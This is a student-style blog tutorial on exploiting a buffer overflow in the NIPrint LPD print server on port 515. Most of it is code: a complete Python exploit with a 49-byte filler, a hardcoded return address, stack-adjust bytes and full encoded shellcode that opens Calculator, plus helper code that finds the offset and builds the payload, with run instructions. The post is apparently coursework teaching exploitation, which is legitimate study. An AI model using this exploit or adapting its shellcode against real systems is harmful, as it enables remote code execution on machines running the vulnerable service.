Friday, 4 November 2011

Week 9 - A NIPrint Buffer Overflow

So today we were given a tutorial on how to exploit a buffer overflow vulnerability in a program called NIPrint. I don't know much about the program itself, but it is an old Windows print server that speaks the LPD (Line Printer Daemon) protocol on TCP port 515, which is the port we will be talking to below. The point is that the program gives us an opportunity to exploit a buffer overflow and see how one actually works. I will basically be walking you through executing the overflow and making it happen.

In class we did a remote buffer overflow between two connected VMs on the same network, but for the sake of saving time I will be simulating the remote aspect of the exploit by using my host's loopback IP address (127.0.0.1) instead of a remote IP. Also note that this tutorial assumes you've already done the work required to determine that the vulnerable buffer takes 49 characters before the next bytes overwrite the saved return pointer on the stack and let us redirect execution to our own code. Here is a link to a blog post that explains how to work that number out.
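The 49-byte offset the post takes as given is normally found with a cyclic pattern: send a string in which every four-byte window is unique, read the value that lands in EIP when the service crashes, and look that value up in the pattern. The following is an added example of that technique in Python, not code from the post or from NIPrint. pattern_create and pattern_offset reimplement the Metasploit-style Aa0Aa1... pattern, and fake_crash_eip is a constructed stand-in for reading EIP in a debugger attached to NIPrint; it is built to "crash" at offset 49 so the lookup can be checked offline.

```python
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"
MAX_PATTERN = len(UPPER) * len(LOWER) * len(DIGITS) * 3   # 20280 bytes before the pattern repeats


def pattern_create(length):
    """Return `length` bytes of the Aa0Aa1Aa2...Ab0Ab1... pattern.

    No 4-byte window repeats within the first MAX_PATTERN bytes, so the value
    found in EIP after the crash identifies exactly one offset in the buffer.
    """
    if length > MAX_PATTERN:
        raise ValueError("pattern longer than %d bytes would repeat" % MAX_PATTERN)
    buf = bytearray()
    for up in UPPER:
        for lo in LOWER:
            for dg in DIGITS:
                buf += (up + lo + dg).encode()
                if len(buf) >= length:
                    return bytes(buf[:length])
    return bytes(buf[:length])


def pattern_offset(pattern, eip):
    """Map the crash EIP (an int as the debugger shows it, or its 4 raw bytes) to an offset.

    Returns None if the value does not come from the pattern, e.g. EIP was never
    overwritten, or the bytes were mangled before they reached the stack.
    """
    needle = struct.pack("<I", eip) if isinstance(eip, int) else bytes(eip)
    idx = pattern.find(needle)
    return None if idx < 0 else idx


def fake_crash_eip(sent, offset=49):
    """Constructed stand-in for the debugger: pretend the saved return address sits
    `offset` bytes into the buffer and return the value that would land in EIP."""
    return struct.unpack("<I", sent[offset:offset + 4])[0]


def find_offset(length=200):
    """The whole workflow: send a pattern, read EIP at the crash, look it up."""
    pattern = pattern_create(length)
    eip = fake_crash_eip(pattern)   # in practice: the EIP value read off the crashed process
    return pattern_offset(pattern, eip)


if __name__ == "__main__":
    print("return address is overwritten at offset", find_offset())
```

Against a live target you would send pattern_create(length) over the same socket the exploit uses, with a length comfortably larger than the suspected buffer, and feed the EIP shown by the debugger into pattern_offset; an EIP of 0x41414141 in that case means you sent plain "A"s, not a pattern.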

So the first thing we have to do is open up NIPrint and confirm that it is functioning properly. After we open NIPrint we have to go to Configuration >> General Settings and enable both Local and Remote print servers by checking the boxes next to the options. After enabling the local and remote print servers NIPrint should look like this:

Next we'll verify that the port NIPrint listens on (515) is open and accepting connections. We'll do this by using telnet to connect to the loopback address on port 515: "telnet 127.0.0.1 515" or "telnet localhost 515" both work. Once you have connected, press Enter once or twice and you should see something like this:

The message "NIPrint received command: This command is not in LPD specification, ignored" tells us that we connected on that port, that NIPrint read what we sent as an LPD command, and that it is ready for the exploit to take place.

In order to demonstrate the buffer overflow I have written a simple Python script that connects to the loopback address on port 515, sends the data required to overflow the buffer and run our "malicious" code, and then closes the connection. Copy and paste the Python code below into a Notepad document, save it with a .py extension, and you will be ready to execute the overflow:
import socket

# 49 bytes of filler reach the saved return address (worked out beforehand), then the new
# return address 0x7C9D30E3 written little-endian, then "add esp, 0xffffefff ; inc esp" to
# move ESP 0x1000 bytes away from our bytes, a single nop, and the payload that pops calc.exe
payload = (b'A' * 49 + b'\xE3\x30\x9D\x7C' + b'\x81\xc4\xff\xef\xff\xff\x44' + b'\x90'
           + b'\xd9\xf7\xd9\x74\x24\xf4\x5f\xbb\xed\xb4\x08\x08\x29\xc9\xb1\x33\x83\xc7\x04\x31\x5f\x14\x03\x5f\xf9\x56\xfd\xf4\xe9\x1e\xfe\x04\xe9\x40\x76\xe1\xd8\x52\xec\x61\x48\x63\x66\x27\x60\x08\x2a\xdc\xf3\x7c\xe3\xd3\xb4\xcb\xd5\xda\x45\xfa\xd9\xb1\x85\x9c\xa5\xcb\xd9\x7e\x97\x03\x2c\x7e\xd0\x7e\xde\xd2\x89\xf5\x4c\xc3\xbe\x48\x4c\xe2\x10\xc7\xec\x9c\x15\x18\x98\x16\x17\x49\x30\x2c\x5f\x71\x3b\x6a\x40\x80\xe8\x68\xbc\xcb\x85\x5b\x36\xca\x4f\x92\xb7\xfc\xaf\x79\x86\x30\x22\x83\xce\xf7\xdc\xf6\x24\x04\x61\x01\xff\x76\xbd\x84\xe2\xd1\x36\x3e\xc7\xe0\x9b\xd9\x8c\xef\x50\xad\xcb\xf3\x67\x62\x60\x0f\xec\x85\xa7\x99\xb6\xa1\x63\xc1\x6d\xcb\x32\xaf\xc0\xf4\x25\x17\xbd\x50\x2d\xba\xaa\xe3\x6c\xd1\x2d\x61\x0b\x9c\x2d\x79\x14\x8f\x45\x48\x9f\x40\x12\x55\x4a\x25\xe2\xa4\x47\xb0\x72\x1f\x32\xf9\x1f\xa0\xe8\x3e\x19\x23\x19\xbf\xde\x3b\x68\xba\x9b\xfb\x80\xb6\xb4\x69\xa7\x65\xb5\xbb\xc4\xe8\x25\x27\x25\x8e\xcd\xc2\x39\x5a')

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', 515))  # loopback stands in for the victim's IP
s.sendall(payload)             # bytes literals so this runs under Python 2 and 3
s.close()



Where you see 's.connect' is where we connect to the victim's PC on the IP and port provided (in our case the loopback address), and where you see 's.sendall' is where we send the data to the victim. The first 49 bytes of 'A' fill the buffer right up to the saved return address on the stack. The four bytes after them overwrite that return address, so when the vulnerable function returns, execution lands in the bytes we sent instead of back in NIPrint. The next seven bytes move the stack pointer out of the way so that our code is not overwritten while it runs, then comes a single NOP, and the rest is the shellcode itself. I won't break the shellcode down byte by byte; it is what gives us the ability to launch our "malicious" program. Because this is just a proof of concept to show that the overflow works, the shellcode simply makes the Calculator program pop up on the victim's computer.
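To make that layout concrete, here is an added Python example, not the post's script and not NIPrint's own code, that assembles the same packet from named parts instead of one long literal. struct.pack('<I', ...) shows why the address 0x7C9D30E3 appears on the wire as E3 30 9D 7C, the stack-adjust bytes are labelled with the instructions they encode, and a bad-character check rejects bytes that would cut the packet short before it reaches the stack. The bad-character set (NUL, plus the CR/LF that end an LPD command) and the int3 placeholder shellcode are assumptions for the demonstration; the post's encoded calc.exe bytes go in the placeholder's place.

```python
import socket
import struct

OFFSET = 49               # filler bytes before the saved return address (from the post)
RET_ADDR = 0x7C9D30E3     # value the post writes over the return address; taken as given
# add esp, 0xffffefff (esp -= 0x1001) ; inc esp  ->  esp -= 0x1000 overall, so anything the
# payload pushes lands well below our bytes instead of on top of them while they execute
STACK_ADJUST = b"\x81\xc4\xff\xef\xff\xff" + b"\x44"
NOP = b"\x90"
# Assumption, not from the post: the command is handled as a C string and LPD commands end
# at a newline, so none of these bytes may appear anywhere in the packet.
BAD_CHARS = b"\x00\x0a\x0d"
# Constructed placeholder: 16 int3 breakpoints. The post's encoded calc.exe bytes go here.
PLACEHOLDER_SHELLCODE = b"\xcc" * 16


def find_bad_chars(data, bad_chars=BAD_CHARS):
    """Return the sorted list of forbidden byte values present in `data`."""
    return sorted({b for b in data if b in bad_chars})


def build_payload(shellcode, offset=OFFSET, ret_addr=RET_ADDR, bad_chars=BAD_CHARS):
    """Assemble filler | return address | stack adjust | nop | shellcode, refusing bad bytes."""
    payload = (b"A" * offset
               + struct.pack("<I", ret_addr)    # little-endian: E3 30 9D 7C on the wire
               + STACK_ADJUST
               + NOP
               + shellcode)
    bad = find_bad_chars(payload, bad_chars)
    if bad:
        raise ValueError("payload contains bad bytes: " + ", ".join("0x%02x" % b for b in bad))
    return payload


def layout(payload, offset=OFFSET):
    """Split a built payload back into its fields, for checking before sending."""
    ret_end = offset + 4
    adj_end = ret_end + len(STACK_ADJUST)
    return {
        "filler": payload[:offset],
        "ret_addr": struct.unpack("<I", payload[offset:ret_end])[0],
        "stack_adjust": payload[ret_end:adj_end],
        "nop": payload[adj_end:adj_end + 1],
        "shellcode": payload[adj_end + 1:],
    }


def send_payload(payload, host="127.0.0.1", port=515, timeout=5.0):
    """Deliver the packet to the LPD port; 127.0.0.1 stands in for the remote victim."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(payload)


if __name__ == "__main__":
    import sys
    pkt = build_payload(PLACEHOLDER_SHELLCODE)
    print("%d bytes, ret_addr=0x%08x" % (len(pkt), layout(pkt)["ret_addr"]))
    if "--send" in sys.argv:      # only fire at a target when asked to
        send_payload(pkt)
```

Running the script without --send only builds and describes the packet, which is the check you want before pointing it at a service: the return address should read back as 0x7C9D30E3 and the bad-character scan should come back empty for whatever shellcode you drop in.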

Anyways, the next step after we've created and saved our Python script is to actually run it. There are a variety of ways to run a Python script, but to keep things easy I will simply navigate to the file on the desktop and double-click it. If all goes well you should see a Windows error message saying that NIPrint has crashed (the overflow has corrupted its stack) and the Windows Calculator should pop up:

So that's basically a buffer overflow, albeit a very simple one with not much purpose, but it demonstrates the ability to exploit a buffer overflow vulnerability in a specific program to execute code that was not intended to be executed.

Hope you enjoyed this demonstration!
